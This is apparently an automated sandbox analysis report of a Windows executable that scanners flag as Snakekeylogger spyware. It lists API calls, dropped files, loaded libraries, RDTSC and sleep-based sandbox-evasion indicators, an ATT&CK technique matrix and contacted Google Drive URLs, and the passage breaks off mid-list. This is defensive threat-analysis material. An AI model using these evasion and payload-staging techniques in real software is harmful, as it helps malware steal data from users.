      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 4_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | File created: C:\Windows\Fonts\frostluften
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | File created: C:\Windows\Fonts\frostluften\Mangrate
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 0_2_00406DE6
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 0_2_004075BD
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 0_2_6FC41BFF
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 4_2_00406DE6
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 4_2_004075BD
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: String function: 00402DCB appears 51 times
      Source: QNuQ5e175D.exe | Static PE information: invalid certificate
      Source: QNuQ5e175D.exe, 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameclanfellow tangleberry.exe4 vs QNuQ5e175D.exe
      Source: QNuQ5e175D.exe, 00000004.00000000.1941328097.0000000000468000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameclanfellow tangleberry.exe4 vs QNuQ5e175D.exe
      Source: QNuQ5e175D.exe | Binary or memory string: OriginalFilenameclanfellow tangleberry.exe4 vs QNuQ5e175D.exe
      Source: QNuQ5e175D.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engine | Classification label: mal68.troj.evad.winEXE@3/5@2/2
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 4_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 0_2_004049E7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 0_2_004021CF CoCreateInstance
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | File created: C:\Users\user\AppData\Local\skattekode
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | File created: C:\Users\user\AppData\Local\Temp\nsd38FF.tmp
      Source: QNuQ5e175D.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: QNuQ5e175D.exe | ReversingLabs: Detection: 44%
      Source: QNuQ5e175D.exe | Virustotal: Detection: 63%
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | File read: C:\Users\user\Desktop\QNuQ5e175D.exe
      Source: unknown | Process created: C:\Users\user\Desktop\QNuQ5e175D.exe "C:\Users\user\Desktop\QNuQ5e175D.exe"
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Process created: C:\Users\user\Desktop\QNuQ5e175D.exe "C:\Users\user\Desktop\QNuQ5e175D.exe"
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Process created: C:\Users\user\Desktop\QNuQ5e175D.exe "C:\Users\user\Desktop\QNuQ5e175D.exe"
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: dwmapi.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: oleacc.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: version.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: shfolder.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: riched20.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: usp10.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: msls31.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: textinputframework.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: coreuicomponents.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: coremessaging.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: textshaping.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: wininet.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: iertutil.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: urlmon.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: srvcli.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: netutils.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: rasadhlp.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: fwpuclnt.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: schannel.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: mskeyprotect.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: ntasn1.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: msasn1.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: dpapi.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: cryptsp.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: rsaenh.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: gpapi.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: ncrypt.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Section loaded: ncryptsslp.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: QNuQ5e175D.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      Source: Yara match | File source: 00000004.00000002.3567436763.00000000017EC000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.1944070834.000000000456C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 0_2_6FC41BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 0_2_6FC430C0 push eax; ret 0_2_6FC430EE
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | File created: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | API/Special instruction interceptor: Address: 4C06ED2
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | API/Special instruction interceptor: Address: 1E86ED2
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | RDTSC instruction interceptor: First address: 4BD9B1D second address: 4BD9B1D instructions: 0x00000000 rdtsc 0x00000002 test bl, cl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FB628C8B858h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | RDTSC instruction interceptor: First address: 1E59B1D second address: 1E59B1D instructions: 0x00000000 rdtsc 0x00000002 test bl, cl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FB628C0C758h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe TID: 7780 | Thread sleep time: -90000s >= -30000s
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Last function: Thread delayed
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 0_2_004068D4 FindFirstFileW,FindClose
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 0_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 0_2_00402930 FindFirstFileW
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 4_2_00402930 FindFirstFileW
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 4_2_004068D4 FindFirstFileW,FindClose
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 4_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.0000000003994000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | API call chain: ExitProcess graph end node | graph_0-4192
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | API call chain: ExitProcess graph end node | graph_0-4195
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 0_2_6FC41BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Process created: C:\Users\user\Desktop\QNuQ5e175D.exe "C:\Users\user\Desktop\QNuQ5e175D.exe"
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe | Code function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
      MITRE ATT&CK matrix (numbers in parentheses are the count of matched signatures for that technique):

      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Native API (1) | DLL Side-Loading (1) | Access Token Manipulation (1) | Masquerading (11) | OS Credential Dumping | Security Software Discovery (21) | Remote Services | Archive Collected Data (1) | Encrypted Channel (11) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection (11) | Virtualization/Sandbox Evasion (1) | LSASS Memory | Virtualization/Sandbox Evasion (1) | Remote Desktop Protocol | Clipboard Data (1) | Ingress Tool Transfer (3) | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | DLL Side-Loading (1) | Access Token Manipulation (1) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | System Information Discovery (23) | Distributed Component Object Model | Input Capture | Application Layer Protocol (14) | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (2) | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | DLL Side-Loading (1) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
      Source | Detection | Scanner | Label
      QNuQ5e175D.exe | 45% | ReversingLabs | Win32.Spyware.Snakekeylogger
      QNuQ5e175D.exe | 64% | Virustotal |
      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll | 0% | Virustotal |
      No Antivirus matches
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      drive.google.com | 142.250.184.206 | true | false | | high
      drive.usercontent.google.com | 172.217.16.193 | true | false | | high
      Name | Source | Malicious | Antivirus Detection | Reputation
      https://www.google.com | QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605627561.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039A8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://drive.google.com/BA90920B1 | QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://translate.google.com/translate_a/element.js | QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.1996475565.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2007544968.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605627561.0000000003A20000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://drive.google.com/ | QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://drive.google.com/ertificates | QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://drive.google.com/s | QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmp | false
                      high
                      https://drive.google.com/F4409BC0D96FBCBDDEEE6C0AFBFQNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://drive.google.com/-QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://drive.usercontent.google.com/QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2007544968.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 